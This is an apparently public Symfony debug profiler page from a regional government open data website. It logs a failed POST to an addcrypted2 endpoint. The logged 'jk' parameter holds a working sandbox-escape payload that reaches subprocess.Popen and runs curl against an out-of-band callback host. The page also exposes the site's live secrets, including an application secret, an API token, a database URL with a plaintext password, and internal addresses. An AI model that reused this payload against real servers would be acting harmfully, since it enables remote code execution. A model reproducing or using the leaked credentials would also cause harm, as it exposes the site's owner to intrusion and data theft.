http://opendata.kedirikab.go.id/flash/addcrypted2?p=flash%2Faddcrypted2

Forwarded to
ErrorController (838762)
Method
POST
HTTP Status
404
IP
172.16.25.100
Profiled on
Token
9c2133

n/a

Request

GET Parameters

Key Value
p 
"flash/addcrypted2"

POST Parameters

Key Value
crypted 
"MTIzNA=="
jk 
"""
\n
// [+] command goes here:\n
let cmd = "curl http://ct2uj5coeu18jq5ah43gnsk5zrshn967w.oast.pro"\n
let hacked, bymarve, n11\n
let getattr, obj\n
\n
hacked = Object.getOwnPropertyNames({})\n
bymarve = hacked.__getattribute__\n
n11 = bymarve("__getattribute__")\n
obj = n11("__class__").__base__\n
getattr = obj.__getattribute__\n
\n
function findpopen(o) {\n
    let result;\n
    for(let i in o.__subclasses__()) {\n
        let item = o.__subclasses__()[i]\n
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {\n
            return item\n
        }\n
        if(item.__name__ != "type" && (result = findpopen(item))) {\n
            return result\n
        }\n
    }\n
}\n
\n
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()\n
console.log(n11)\n
function f() {\n
    return n11\n
}\n
\n
"""
package 
"pkg"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_remove_csp_headers 
true
_stopwatch_token 
"afdf1d"

Request Headers

Header Value
accept-encoding 
"gzip"
authorization 
""
connection 
"close"
content-length 
"1350"
content-type 
"application/x-www-form-urlencoded"
host 
"opendata.kedirikab.go.id"
user-agent 
"Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
x-forwarded-for 
"192.168.60.9"
x-forwarded-proto 
"https"
x-forwarded-scheme 
"https"
x-php-ob-level 
"1"
x-real-ip 
"192.168.60.9"

Request Content

Raw

package=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//ct2uj5coeu18jq5ah43gnsk5zrshn967w.oast.pro%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Tue, 26 Nov 2024 15:35:10 GMT"
x-debug-exception 
"No%20route%20found%20for%20%22POST%20http%3A%2F%2Fopendata.kedirikab.go.id%2Fflash%2Faddcrypted2%22"
x-debug-exception-file 
"%2Fvar%2Fwww%2Fhtml%2Fopen_data%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token 
"9c2133"
x-debug-token-link 
"http://opendata.kedirikab.go.id/_profiler/838762"
x-previous-debug-token 
"838762"
x-robots-tag 
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
API_TOKEN 
"4a81432adf56aeb6aadfffa65ab70ab1"
API_URL 
"http://172.16.16.68/api_/opendata.php"
APP_CLIENT_ADDRESS 
"Jl. Sekartaji No.2, Sumber, Doko, Kec. Ngasem, Kabupaten Kediri, Jawa Timur"
APP_CLIENT_CONTACT 
"Telp. (0354) 682152"
APP_CLIENT_EMAIL 
""
APP_CLIENT_NAME 
"Kabupaten Kediri"
APP_CLIENT_SHORTNAME 
"Kabupaten Kediri"
APP_ENV 
"dev"
APP_ICON 
"assets/logo/logo_masbup.png"
APP_ICON_LOGO 
"assets/logo/kota_kediri.png"
APP_NAME 
"Open Data Kediri"
APP_SECRET 
"302717838b52f3d1699a25e8e3ef6a9d"
COLOR_DANGER 
"#b20238;"
COLOR_INFO 
"#e8d21d;"
COLOR_PRIMARY 
"#039fbe;"
COLOR_WARNING 
"#cf1578;"
DATABASE_URL 
"postgresql://postgres:opendata2022!@127.0.0.1:5432/open_data_kediri?serverVersion=13&charset=utf8"
OPEN_DATA_ICON 
"assets/logo/logo_masbup_merah.png"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"1350"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT 
"/var/www/html/open_data/public/"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/var/www/html/open_data/public/"
GATEWAY_INTERFACE 
"CGI/1.1"
HTTP_ACCEPT_ENCODING 
"gzip"
HTTP_AUTHORIZATION 
""
HTTP_CONNECTION 
"close"
HTTP_HOST 
"opendata.kedirikab.go.id"
HTTP_USER_AGENT 
"Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
HTTP_X_FORWARDED_FOR 
"192.168.60.9"
HTTP_X_FORWARDED_PROTO 
"https"
HTTP_X_FORWARDED_SCHEME 
"https"
HTTP_X_REAL_IP 
"192.168.60.9"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"p=flash/addcrypted2"
REDIRECT_QUERY_STRING 
"p=flash/addcrypted2"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/flash/addcrypted2"
REMOTE_ADDR 
"172.16.25.100"
REMOTE_PORT 
"47234"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"http"
REQUEST_TIME 
1732635310
REQUEST_TIME_FLOAT 
1732635310.6586
REQUEST_URI 
"/flash/addcrypted2"
SCRIPT_FILENAME 
"/var/www/html/open_data/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"172.16.16.52"
SERVER_ADMIN 
"[no address given]"
SERVER_NAME 
"opendata.kedirikab.go.id"
SERVER_PORT 
"80"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
""
SERVER_SOFTWARE 
"Apache"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_URL,API_URL,API_TOKEN,APP_NAME,OPEN_DATA_ICON,APP_ICON,APP_ICON_LOGO,APP_CLIENT_NAME,APP_CLIENT_SHORTNAME,APP_CLIENT_ADDRESS,APP_CLIENT_CONTACT,APP_CLIENT_EMAIL,COLOR_PRIMARY,COLOR_WARNING,COLOR_INFO,COLOR_DANGER"

Sub Requests 1

ErrorController (token = 838762)

Key Value
_controller 
"error_controller"
_stopwatch_token 
"3ea777"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#55
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST http://opendata.kedirikab.go.id/flash/addcrypted2""
  #code: 0
  #file: "/var/www/html/open_data/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#102 …}
  trace: {
    /var/www/html/open_data/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/html/open_data/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:118 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /var/www/html/open_data/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/html/open_data/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/html/open_data/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/html/open_data/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/html/open_data/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/html/open_data/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/html/open_data/public/index.php:20 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
    }
  }
}
logger 
null